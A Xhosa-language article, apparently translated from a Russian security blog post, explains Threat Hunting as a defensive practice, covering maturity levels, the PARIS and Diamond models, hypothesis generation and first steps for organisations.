I-95% yezoyikiso zokhuseleko lolwazi ziyaziwa, kwaye unokuzikhusela kuzo usebenzisa iindlela zemveli ezifana ne-antivirus, i-firewall, i-IDS, i-WAF. I-5% eseleyo yezoyikiso ayaziwa kwaye iyingozi kakhulu. Benza i-70% yomngcipheko wenkampani ngenxa yokuba kunzima kakhulu ukubabona, kuncinci ukukhusela kubo. Imizekelo ngaba i-WannaCry ransomware epidemic, i-NotPetya / ExPetr, i-cryptominers, "isixhobo se-cyber" i-Stuxnet (eyabetha izixhobo zenyukliya zase-Iran) kunye nabaninzi (nabani na omnye okhumbula i-Kido / Conficker?) Olunye uhlaselo olungakhuselwanga kakuhle kakhulu kunye nemilinganiselo yokhuseleko lwakudala. Sifuna ukuthetha malunga nendlela yokuchasana nale 5% yezoyikiso usebenzisa iteknoloji yeThreat Hunting.
Ukuziphendukela kwemvelo okuqhubekayo kohlaselo lwe-cyber kufuna ukufunyanwa rhoqo kunye nemilinganiselo, ekugqibeleni isikhokelela ekubeni sicinge ngomdyarho weengalo ongapheliyo phakathi kwabahlaseli nabakhuseli. Iinkqubo zokhuseleko zakudala azisakwazi ukubonelela ngenqanaba elamkelekileyo lokhuseleko, apho umgangatho womngcipheko awuchaphazeli izalathisi eziphambili zenkampani (ezoqoqosho, ezopolitiko, udumo) ngaphandle kokuziguqulela kwisiseko esithile, kodwa ngokubanzi zigubungela ezinye iingozi. Sele sele ikwinkqubo yokuphunyezwa kunye nokucwangciswa, iinkqubo zokhuseleko zanamhlanje zizifumana zidlala indima yokubamba kwaye kufuneka ziphendule kwimingeni yexesha elitsha.
Itekhnoloji yokuzingela umngcipheko inokuba yenye yeempendulo kwimingeni yexesha lethu kwingcali yokhuseleko lolwazi. Igama elithi Threat Hunting (emva koku libizwa ngokuba yiTH) lavela kwiminyaka eliqela eyadlulayo. Itekhnoloji ngokwayo inomdla kakhulu, kodwa ayikabinayo nayiphi na imigangatho kunye nemigaqo eyamkelekileyo ngokubanzi. Lo mbandela unzima ngokungafaniyo kwemithombo yolwazi kunye nenani elincinci lemithombo yolwazi lwesiRashiya malunga nesi sihloko. Kule nkalo, thina kwi-LANIT-Integration sinqume ukubhala ukuhlaziywa kobu buchwepheshe.
Ukubaluleka
Itekhnoloji ye-TH ixhomekeke kwiinkqubo zokubeka iliso kwiziseko zophuhliso.. Ukwazisa (okufana neenkonzo ze-MSSP) yindlela yemveli yokukhangela imisayino ephuhliswe ngaphambili kunye neempawu zohlaselo kunye nokusabela kuzo. Lo mzekelo wenziwa ngempumelelo zizixhobo zokukhusela ezisekelwe kwisiginitsha. Ukuzingela (inkonzo yohlobo lwe-MDR) yindlela yokubeka iliso ephendula umbuzo othi "Izisayinwe kunye nemithetho zivela phi?" Yinkqubo yokudala imigaqo yokulungelelanisa ngokuhlalutya izikhombisi ezifihliweyo okanye ezingaziwa ngaphambili kunye neempawu zokuhlaselwa. Threat Hunting ibhekiselele kolu hlobo esweni.
Kuphela ngokudibanisa zombini iindidi zokubek'esweni sifumana ukhuseleko olusondeleyo kumbono, kodwa kuhlala kukho inqanaba elithile lomngcipheko oseleyo.
Ukukhuselwa usebenzisa iindidi ezimbini zokubeka iliso
Nasi isizathu sokuba i-TH (kunye nokuzingela ngokupheleleyo!) kuya kuba yimfuneko ngakumbi:
Izoyikiso, amayeza, imingcipheko.
. Ezi ziquka iindidi ezifana ne-spam, i-DDoS, iintsholongwane, i-rootkits kunye nezinye i-malware yakudala. Unokuzikhusela kwezi zoyikiso usebenzisa imilinganiselo yokhuseleko efanayo.
Ngexesha lokuphunyezwa kwayo nayiphi na iprojekthi, kwaye i-20% eseleyo yomsebenzi ithatha i-80% yexesha. Ngokukwanjalo, kuwo wonke umhlaba wezoyikiso, i-5% yezoyikiso ezintsha ziya kuphendula i-70% yomngcipheko kwinkampani. Kwinkampani apho iinkqubo zolawulo lokhuseleko lolwazi zilungelelaniswe, sinokulawula i-30% yomngcipheko wokuphunyezwa kwezisongelo ezaziwayo ngendlela enye okanye enye ngokuphepha (ukwala amanethiwekhi angenazingcingo ngokomgaqo), ukwamkela (ukuphumeza amanyathelo okhuseleko ayimfuneko) okanye ukutshintshwa. (umzekelo, emagxeni omhlanganisi) lo mngcipheko. Zikhusele kwi, APT uhlaselo, phishing,, i-cyber espionage kunye nemisebenzi yelizwe, kunye nenani elikhulu lolunye uhlaselo sele lunzima kakhulu. Iziphumo zezi 5% zezoyikiso ziya kuba zibi kakhulu () kuneziphumo zikagaxekile okanye iivayirasi, apho isoftware ye-antivirus igcinwa khona.
Phantse wonke umntu kufuneka ajongane ne-5% yezoyikiso. Kutshanje kuye kwafuneka sifake isisombululo somthombo ovulekileyo esisebenzisa isicelo esivela kwi-PEAR (PHP Extension and Application Repository) yokugcina. Inzame yokuhlohla esisicelo ngepere yokuhlohla ayiphumelelanga kuba ibingafumaneki (ngoku kukho istub kuyo), kuye kwafuneka ndiyifake kwiGitHub. Kwaye kutshanje kuye kwavela ukuba i-PEAR yaba lixhoba.
Usakhumbula, ubhubhane we-NePetya ransomware ngokusebenzisa imodyuli yohlaziyo lwenkqubo yengxelo yerhafu. Izoyikiso ziya zisiba nzima ngakumbi, kwaye umbuzo onengqondo uyavela - "Singamelana njani nezi 5% zezoyikiso?"
Inkcazo yeNgozi yokuzingela
Ke, iTreat Hunting yinkqubo yokukhangela okukhawulezileyo kunye nokuphindaphinda kunye nokufumanisa izoyikiso eziphambili ezingenakubonwa ngezixhobo zokhuseleko zemveli. Izisongelo eziphezulu ziquka, umzekelo, ukuhlaselwa okufana ne-APT, ukuhlaselwa kwe-0-day vulnerabilities, Ukuphila ngaphandle koMhlaba, njalo njalo.
Sinokuphinda sichaze ukuba i-TH yinkqubo yokuvavanya iingcamango. Le yinkqubo yezandla enezinto ezizenzekelayo, apho umhlalutyi, exhomekeke kulwazi kunye nezakhono zakhe, ahluze ulwazi oluninzi ekufuneni iimpawu zokuthobela ezihambelana ne-hypothesis egqitywe ekuqaleni malunga nobukho besongelo esithile. Uphawu lwayo olwahlukileyo luluhlu lwemithombo yolwazi.
Kufuneka kuqatshelwe ukuba iTreat Hunting ayilohlobo oluthile lwesoftware okanye imveliso yehardware. Ezi ayizozilumkiso ezinokubonwa kwisisombululo esithile. Le asiyonkqubo yokukhangela ye-IOC (Ii-Identifiers of Compromise). Kwaye olu alulo uhlobo oluthile lomsebenzi owenziweyo owenzekayo ngaphandle kokuthatha inxaxheba kwabahlalutyi bokhuseleko lolwazi. Umngcipheko wokuzingela kuqala kwaye uphambili yinkqubo.
Amacandelo oNgozi lokuzingela
Amacandelo amathathu aphambili okuZingela iTreat: idatha, itekhnoloji, abantu.
Idatha (yintoni?), kuquka iDatha enkulu. Zonke iintlobo zokuhamba kwezithuthi, ulwazi malunga nee-APT zangaphambili, uhlalutyo, idatha yomsebenzisi, idatha yenethiwekhi, ulwazi oluvela kubasebenzi, ulwazi kwi-darknet kunye nokunye okuninzi.
Itekhnoloji (njani?) ukucubungula le datha - zonke iindlela ezinokwenzeka zokucubungula le datha, kuquka ukuFunda koMatshini.
Abantu (ngubani?) -abo banamava amaninzi ekuhlalutyeni uhlaselo olwahlukeneyo, intuition ephuhlisiwe kunye nokukwazi ukubona ukuhlaselwa. Ngokuqhelekileyo aba ngabahlalutyi bokhuseleko lolwazi ekufuneka babenakho ukwenza i-hypotheses kwaye bafumane isiqinisekiso kubo. Ziyikhonkco eliphambili kwinkqubo.
Umzekelo PARIS
UAdam Bateman Imodeli ye-PARIS yenkqubo efanelekileyo ye-TH. Eli gama libhekisa kwindawo edumileyo yaseFransi. Lo mzekelo unokujongwa kwiindlela ezimbini - ukusuka phezulu nangaphantsi.
Njengoko sisebenza ngendlela yethu kwimodeli ukusuka ezantsi ukuya phezulu, siya kudibana nobungqina obuninzi bomsebenzi okhohlakeleyo. Iqhekeza ngalinye lobungqina linomlinganiselo obizwa ngokuba yintembelo - uphawu olubonisa ubunzima bobu bungqina. Kukho "intsimbi", ubungqina obuthe ngqo bomsebenzi okhohlakeleyo, ngokubhekiselele apho sinokufikelela ngokukhawuleza phezulu kwephiramidi kwaye senze isilumkiso sangempela malunga nokusuleleka okwaziwayo ngokuchanekileyo. Kwaye kukho ubungqina obungathanga ngqo, isixa esingasikhokelela encotsheni yephiramidi. Njengamaxesha onke, kukho ubungqina obuninzi obungathanga ngqo kunobungqina obuthe ngqo, oku kuthetha ukuba kufuneka bahlelwe kwaye bahlalutywe, uphando olongezelelweyo kufuneka lwenziwe, kwaye kuyacetyiswa ukuba ngokuzenzekelayo oku.
Umzekelo PARIS.
Inxalenye ephezulu yemodeli (i-1 kunye ne-2) isekelwe kwi-automation technologies kunye ne-analytics eyahlukeneyo, kwaye inxalenye engezantsi (3 kunye ne-4) isekelwe kubantu abaneziqinisekiso ezithile ezilawula inkqubo. Unokuqwalasela imodeli eshukumayo ukusuka phezulu ukuya ezantsi, apho kwindawo ephezulu yombala ohlaza okwesibhakabhaka sinezilumkiso ezivela kwizixhobo zokhuseleko zendabuko (i-antivirus, i-EDR, i-firewall, isayinwe) kunye neqondo eliphezulu lokuzithemba kunye nokuthembela, kwaye ngezantsi kukho izikhombisi (i-antivirus, i-EDR, i-firewall, isayinwe) I-IOC, i-URL, i-MD5 kunye nezinye), ezinezinga elisezantsi lokuqinisekisa kwaye zifuna isifundo esongezelelweyo. Kwaye inqanaba eliphantsi kunye nelona likhulu (4) yisizukulwana se-hypotheses, ukudalwa kweemeko ezintsha zokusebenza kweendlela zendabuko zokukhusela. Eli nqanaba alikhawulelwanga kuphela kwimithombo ekhankanyiweyo yeengcamango. Okukhona inqanaba lisezantsi, kokukhona iimfuno ezingaphezulu zibekwe kwiziqinisekiso zomhlalutyi.
Kubaluleke kakhulu ukuba abahlalutyi bangavavanyi nje iseti emiselweyo yeengqikelelo ezimiselwe kwangaphambili, kodwa bahlala besebenza ukuvelisa iingcamango ezintsha kunye neendlela zokuzivavanya.
TH Ukusetyenziswa kweModeli yokuKhula
Ehlabathini elifanelekileyo, i-TH yinkqubo eqhubekayo. Kodwa, ekubeni kungekho hlabathi lifanelekileyo, makhe sihlalutye kunye neendlela malunga nabantu, iinkqubo kunye nobuchwepheshe obusetyenziswayo. Makhe siqwalasele imodeli ye-TH eyingqukuva efanelekileyo. Kukho amanqanaba ama-5 okusebenzisa le teknoloji. Makhe sijonge kubo sisebenzisa umzekelo wokuzivelela kweqela elinye labahlalutyi.
Amanqanaba okukhula
Abantu
Iinkqubo
zobugcisa
Inqanaba le-0
SOC abahlalutyi
24/7
Izixhobo zesiNtu:
YesiNtu
Iseti yezivuseleli
Ukubeka iliso kusenzelwa
IDS, AV, Sandboxing,
Ngaphandle kweTH
Ukusebenza nezilumkiso
Izixhobo zokuhlalutya umsayino, idatha yeTreat Intelligence.
Inqanaba le-1
SOC abahlalutyi
Ixesha elinye TH
I-EDR
Uvavanyo
Ulwazi olusisiseko lwe-forensics
Ukukhangela kwe-IOC
Ukugqunywa ngokuyinxenye kwedatha kwizixhobo zenethiwekhi
Imifuniselo nge-TH
Ulwazi olulungileyo lwenethiwekhi kunye nezicelo
Ukusetyenziswa ngokuyinxenye
Inqanaba le-2
Umsebenzi wexeshana
Iimbaleki
I-EDR
Ngamaxesha athile
I-avareji yolwazi lwe-forensics
Iveki ukuya kwinyanga
Isicelo esipheleleyo
TH okwethutyana
Ulwazi olugqwesileyo lwenethiwekhi kunye nokusetyenziswa
Rhoqo TH
I-automation epheleleyo yokusetyenziswa kwedatha ye-EDR
Ukusetyenziswa ngokuyinxenye kobuchule obuphezulu be-EDR
Inqanaba le-3
Umyalelo ozinikeleyo we-TH
24/7
Isakhono esingaphelelanga sokuvavanya iingqikelelo ze-TH
Uthintelo
Ulwazi olugqwesileyo lwe-forensics kunye ne-malware
Uthintelo lwe-TH
Ukusetyenziswa ngokupheleleyo kwezakhono eziphezulu ze-EDR
Iimeko ezikhethekileyo TH
Ulwazi olugqwesileyo lwecala elihlaselayo
Iimeko ezikhethekileyo TH
Ukugubungela ngokupheleleyo idatha evela kwizixhobo zenethiwekhi
Uqwalaselo ukuze luhambelane neemfuno zakho
Inqanaba le-4
Umyalelo ozinikeleyo we-TH
24/7
Ukukwazi ngokupheleleyo ukuvavanya i-TH hypotheses
Ukukhokela
Ulwazi olugqwesileyo lwe-forensics kunye ne-malware
Uthintelo lwe-TH
Inqanaba lesi-3, kunye:
Ukusebenzisa i-TH
Ulwazi olugqwesileyo lwecala elihlaselayo
Ukuvavanya, ukuzenzekelayo kunye nokuqinisekiswa kweengcamango TH
ukuhlanganiswa okuqinileyo kwemithombo yedatha;
Isakhono sophando
uphuhliso ngokweemfuno kunye nokusetyenziswa okungaqhelekanga kwe-API.
Amanqanaba okuvuthwa kweTH ngabantu, iinkqubo kunye nobuchwepheshe
Inqanaba le-0: yemveli, ngaphandle kokusebenzisa TH. Abahlalutyi abaqhelekileyo basebenza kunye nesethi eqhelekileyo yezilumkiso kwimodi yokubeka iliso engabonakaliyo usebenzisa izixhobo eziqhelekileyo kunye nobuchwepheshe: i-IDS, i-AV, i-sandbox, izixhobo zokuhlalutya isignesha.
Inqanaba le-1: umfuniselo, usebenzisa TH. Abahlalutyi abafanayo abanolwazi olusisiseko lwe-forensics kunye nolwazi oluhle lwenethiwekhi kunye nezicelo banokuqhuba i-Treat Hunting ngexesha elinye ngokukhangela izikhombisi zokuthobela. Ii-EDR zongezwa kwizixhobo ezinokugubungela ngokuyinxenye idatha evela kwizixhobo zenethiwekhi. Izixhobo zisetyenziswa ngokuyinxenye.
Inqanaba le-2: ngamaxesha, okwethutyana TH. Abahlalutyi abafanayo abasele bephucule ulwazi lwabo kwi-forensics, amanethiwekhi kunye nenxalenye yesicelo kufuneka ukuba bahlanganyele rhoqo kwi-Threat Hunting (sprint), bathi, ngeveki ngenyanga. Izixhobo zongeza ukuphononongwa okupheleleyo kwedatha kwizixhobo zenethiwekhi, i-automation ye-data analysis evela kwi-EDR, kunye nokusetyenziswa kwenxalenye ye-EDR ephezulu.
Inqanaba le-3: ukuthintela, iimeko rhoqo TH. Abahlalutyi bethu bazilungelelanise baba liqela elizinikeleyo kwaye baqala ukuba nolwazi olubalaseleyo lwe-forensics kunye ne-malware, kunye nolwazi lweendlela kunye nobuchule becala lokuhlasela. Inkqubo sele iqhutywe 24/7. Iqela liyakwazi ukuvavanya ngokuyinxenye i-TH hypotheses ngelixa lixhamla ngokupheleleyo amandla aphezulu e-EDR kunye nokugubungela ngokupheleleyo idatha evela kwizixhobo zenethiwekhi. Abahlalutyi nabo bayakwazi ukuqwalasela izixhobo ezihambelana neemfuno zabo.
Inqanaba le-4: ephezulu, sebenzisa i-TH. Iqela elifanayo lifumene ukukwazi ukuphanda, ukukwazi ukuvelisa kunye nokwenza ngokuzenzekelayo inkqubo yokuvavanya i-TH hypotheses. Ngoku izixhobo ziye zongezwa ngokudityaniswa ngokusondeleyo kwemithombo yedatha, uphuhliso lwesoftware ukuhlangabezana neemfuno, kunye nokusetyenziswa okungaqhelekanga kwee-APIs.
IiTechniques zokuzingela ezisongelayo
Basic Threat Huntiques Techniques
Π I-TH, ngokulandelelana kokuvuthwa kobuchwepheshe obusetyenzisiweyo, zezi: ukukhangela okusisiseko, uhlalutyo lwamanani, ubuchule bokubonwayo, ukuhlanganiswa okulula, ukufundwa komatshini, kunye neendlela zaseBayesian.
Eyona ndlela ilula, ukukhangela okusisiseko, isetyenziselwa ukucutha indawo yophando usebenzisa imibuzo ethile. Uhlalutyo lwamanani lusetyenziswa, umzekelo, ukwakha umsebenzisi oqhelekileyo okanye umsebenzi womnatha ngendlela yemodeli yamanani. Ubuchule bokubonwa busetyenziselwa ukubonisa ngokubonakalayo kunye nokwenza lula uhlalutyo lwedatha ngendlela yeegrafu kunye neetshathi, ezenza kube lula kakhulu ukuqonda iipatheni kwisampuli. Ubuchwephesha bokudityaniswa okulula ngemimandla ephambili busetyenziselwa ukwenza uphando kunye nohlalutyo olukhulu. Okukhona inkqubo ye-TH yombutho ikhulile ifikelela, kokukhona kufanelekile ukusetyenziswa kwealgorithms yokufunda koomatshini. Zikwasetyenziswa ngokubanzi ekuhluzeni ugaxekile, ukukhangela i-traffic engalunganga kunye nokufumanisa imisebenzi yobuqhophololo. Uhlobo oluphezulu kakhulu lwe-algorithm yokufunda komatshini ziindlela zeBayesian, ezivumela ukuhlelwa, ukunciphisa ubungakanani besampulu, kunye nomzekelo wesihloko.
Imodeli yeDayimane kunye ne-TH Strategies
USergio Caltagiron, uAndrew Pendegast kunye noChristopher Betz emsebenzini wabo "Β» ibonise amalungu aphambili awo nawuphi na umsebenzi okhohlakeleyo kunye nonxulumano olusisiseko phakathi kwawo.
Imodeli yedayimani yomsebenzi okhohlakeleyo
Ngokwalo mzekelo, kukho izicwangciso ze-4 zokuzingela i-Threat, ezisekelwe kumacandelo abalulekileyo ahambelanayo.
1. Isicwangciso esijolise kumaxhoba. Sicinga ukuba ixhoba linabachasi kwaye baya kuhambisa "amathuba" nge-imeyile. Sikhangela idatha yotshaba kwiposi. Khangela amakhonkco, izihlomelo, njl. Sijonge ukuqinisekiswa kwale ngcamango ixesha elithile (inyanga, iiveki ezimbini); ukuba asiyifumani, i-hypothesis ayizange isebenze.
2. Isicwangciso esisekelwe kwiziseko zophuhliso. Kukho iindlela ezininzi zokusebenzisa esi sicwangciso. Ngokuxhomekeke ekufikeleleni nasekubonakaleni, ezinye zilula kunabanye. Umzekelo, sibeka iliso kwiiseva zegama lesizinda ezaziwa ngokubamba imimandla enobungozi. Okanye sihamba kwinkqubo yokubeka esweni zonke iirejista zegama lesizinda elitsha kwipateni eyaziwayo esetyenziswe ngumchasi.
3. Isicwangciso esiqhutywa kukukwazi. Ukongeza kwiqhinga elijoliswe kwixhoba elisetyenziswe ngabaninzi abakhuseli benethiwekhi, kukho isicwangciso esijoliswe ngamathuba. Yesibini ethandwa kakhulu kwaye igxile ekufumaneni amandla otshaba, oko kukuthi "i-malware" kunye nokukwazi komchasi ukusebenzisa izixhobo ezisemthethweni ezifana ne-psexec, i-powershell, i-certutil kunye nabanye.
4. Isicwangciso esijolise kutshaba. Indlela yokujongana nomchasi igxininisa kumchasi ngokwakhe. Oku kubandakanya ukusetyenziswa kolwazi oluvulekileyo oluvela kwimithombo yoluntu ekhoyo (OSINT), ukuqokelela idatha malunga notshaba, ubuchule bakhe kunye neendlela (TTP), uhlalutyo lweziganeko zangaphambili, idatha ye-Treat Intelligence, njl.
Imithombo yolwazi kunye neengcamango kwi-TH
Eminye imithombo yolwazi lweTreat Hunting
Inokuba mininzi imithombo yolwazi. Umhlalutyi ofanelekileyo kufuneka akwazi ukukhupha ulwazi kuyo yonke into ejikelezileyo. Imithombo eqhelekileyo phantse nayiphi na isiseko iya kuba yidatha evela kwizixhobo zokhuseleko: DLP, SIEM, IDS / IPS, WAF / FW, EDR. Kwakhona, imithombo yolwazi eqhelekileyo iya kuba zizalathisi ezahlukahlukeneyo zokuthomalalisa, iinkonzo zeTreat Intelligence, iCERT kunye nedatha ye-OSINT. Ukongeza, ungasebenzisa ulwazi oluvela kwi-darknet (umzekelo, ngokukhawuleza kukho umyalelo wokukrazula ibhokisi yeposi yentloko yombutho, okanye umgqatswa wesikhundla sobunjineli womnatha uye wavezwa ngomsebenzi wakhe), ulwazi olufunyenwe I-HR (uphononongo lomviwa ovela kwindawo yangaphambili yomsebenzi), ulwazi oluvela kwinkonzo yezokhuseleko (umzekelo, iziphumo zokuqinisekisa i-counterparty).
Kodwa ngaphambi kokusebenzisa yonke imithombo ekhoyo, kuyimfuneko ukuba ube ne-hypothesis enye.
Ukuze kuvavanywe iingqikelelo, kufuneka kuqala zibekwe phambili. Kwaye ukuze ubeke phambili iingcamango ezininzi ezikumgangatho ophezulu, kuyimfuneko ukusebenzisa indlela ecwangcisiweyo. Inkqubo yokuvelisa iingqikelelo ichazwe ngokubanzi kwi, kulungele kakhulu ukuthatha esi sikimu njengesiseko senkqubo yokubeka phambili iingcamango.
Umthombo oyintloko weengqikelelo uya kuba ATT & CK matrix (Amaqhinga oMchasi, ubuChwepheshe kunye noLwazi oluQhelekileyo). Ngokwenene, isiseko solwazi kunye nomzekelo wokuvavanya ukuziphatha kwabahlaseli abenza imisebenzi yabo kumanyathelo okugqibela okuhlaselwa, ngokuqhelekileyo kuchazwe ngokusebenzisa ingcamango ye-Kill Chain. Oko kukuthi, kumanqanaba emva kokuba umhlaseli engene kwinethiwekhi yangaphakathi yeshishini okanye kwisixhobo esiphathwayo. Isiseko solwazi ekuqaleni sasibandakanya iinkcazo ze-121 amaqhinga kunye nobuchule obusetyenzisiweyo ekuhlaselweni, nganye kuzo ichazwe ngokweenkcukacha kwifomathi ye-Wiki. Uhlalutyo olwahlukeneyo lweTreat Intelligence lufanelekile njengomthombo wokuvelisa ucingelo. Eyona ngqalelo ziziphumo zohlalutyo lweziseko zophuhliso kunye neemvavanyo zokungena - le yeyona datha ixabisekileyo inokusinika i-ironclad hypotheses ngenxa yokuba zisekelwe kwiziseko ezithile kunye neentsilelo zayo ezithile.
Inkqubo yokuvavanya i-hypothesis
USergei Soldatov wazisa ngenkcazo ecacileyo yenkqubo, ibonisa inkqubo yokuvavanya i-TH hypotheses kwinkqubo enye. Ndiya kubonisa izigaba eziphambili ngenkcazo emfutshane.
Inqanaba loku-1: Ifama ye-TI
Kweli nqanaba kuyimfuneko ukugqamisa izinto (ngokuzihlalutya kunye nayo yonke idatha yesoyikiso) kwaye ubanike iilebhile zeempawu zabo. Ezi zifayile, i-URL, i-MD5, inkqubo, into eluncedo, isiganeko. Xa udlula kwiinkqubo zeTreat Intelligence, kuyafuneka ukuba uncamathisele iithegi. Oko kukuthi, le ndawo yaqatshelwa kwi-CNC kunyaka onjalo, le MD5 yadityaniswa ne-malware enjalo, le MD5 yakhutshelwa kwindawo esasaza i-malware.
Inqanaba 2: Amatyala
Kwinqanaba lesibini, sijonga intsebenziswano phakathi kwezi zinto kwaye sichonge ubudlelwane phakathi kwazo zonke ezi zinto. Sifumana iinkqubo eziphawulweyo ezenza into embi.
Inqanaba 3: Umhlalutyi
Kwinqanaba lesithathu, ityala lidluliselwa kumhlalutyi onamava onamava amaninzi ekuhlalutyeni, kwaye wenza isigwebo. Uhlahlela phantsi kwii-bytes yintoni, phi, njani, kutheni kwaye kutheni le khowudi isenza. Lo mzimba ubuyi-malware, le khomputha yosulelekile. Ityhila unxibelelwano phakathi kwezinto, ijonga iziphumo zokuhamba ngebhokisi yesanti.
Iziphumo zomsebenzi womhlalutyi zigqithiselwa ngakumbi. I-Digital Forensics ihlola imifanekiso, i-Malware Analysis ihlola "imizimba" efunyenweyo, kwaye iqela le-Incident Response lingaya kwindawo kwaye liphande into esele ikhona. Isiphumo somsebenzi siya kuba yi-hypothesis eqinisekisiweyo, uhlaselo oluchongiweyo kunye neendlela zokulwa nalo.
Iziphumo
I-Treat Hunting yitekhnoloji eselula enokumelana ngokufanelekileyo nezisoyikiso ezilungelelanisiweyo, ezintsha nezingezomgangatho, ezinethemba elikhulu xa kujongwa inani elikhulayo lezo zoyikiso kunye nobunzima obukhulayo beziseko zoshishino. Ifuna amacandelo amathathu - idatha, izixhobo kunye nabahlalutyi. Izibonelelo zokuZingela iTreat azikhawulelwanga ekuthinteleni ukuphunyezwa kwezisongelo. Ungalibali ukuba ngexesha lenkqubo yokukhangela sintywila kwiziseko zethu kunye neendawo ezibuthathaka ngamehlo omhlalutyi wezokhuseleko kwaye sinokomeleza ngakumbi la manqaku.
Amanyathelo okuqala, ngokombono wethu, kufuneka athathwe ukuqalisa inkqubo ye-TH kumbutho wakho.
- Qaphela ukukhusela isiphelo kunye neziseko zothungelwano. Qaphela ukubonakala (i-NetFlow) kunye nokulawula (i-firewall, i-IDS, i-IPS, i-DLP) yazo zonke iinkqubo kwinethiwekhi yakho. Yazi inethiwekhi yakho ukusuka kumda wendlela ukuya kumamkeli wokugqibela.
- Jonga.
- Ukuqhuba i-pentest rhoqo ubuncinane bemithombo yangaphandle engundoqo, uhlalutye iziphumo zayo, uchonge iinjongo eziphambili zokuhlaselwa kwaye uvale ubuthathaka babo.
- Ukuphumeza inkqubo evulekileyo ye-Treat Intelligence system (umzekelo, i-MISP, i-Yeti) kwaye uhlalutye iilogi ngokubambisana nayo.
- Ukuphumeza iqonga lokuphendula isiganeko (IRP): I-R-Vision IRP, iHive, ibhokisi yesanti yokuhlalutya iifayile ezikrokrisayo (FortiSandbox, Cuckoo).
- Zizenzele iinkqubo zesiqhelo. Uhlalutyo lweelogi, ukurekhoda kweziganeko, ukwazisa abasebenzi yintsimi enkulu yokuzenzekelayo.
- Funda ukusebenzisana ngokufanelekileyo neenjineli, abaphuhlisi, kunye nenkxaso yobugcisa ukusebenzisana kwiziganeko.
- Bhala yonke inkqubo, amanqaku aphambili, iziphumo ezifunyenweyo ukuze ubuyele kubo kamva okanye wabelane ngale datha kunye noogxa;
- Yiba noluntu: Qaphela okwenzekayo kubasebenzi bakho, ngubani obaqeshileyo, kwaye ngubani onika ukufikelela kwimithombo yolwazi yombutho.
- Gcina unolwazi lweendlela kwintsimi yezoyikiso ezintsha kunye neendlela zokukhusela, ukwandisa izinga lakho lobuchule bokufunda nokubhala (kubandakanywa nokusebenza kweenkonzo ze-IT kunye ne-subsystems), ukuya kwiinkomfa kunye nokunxibelelana nabalingane.
Ukulungele ukuxoxa ngombutho wenkqubo ye-TH kumazwana.
Okanye yiza usebenze nathi!
Imithombo kunye nezixhobo zokufunda
umthombo: www.habr.com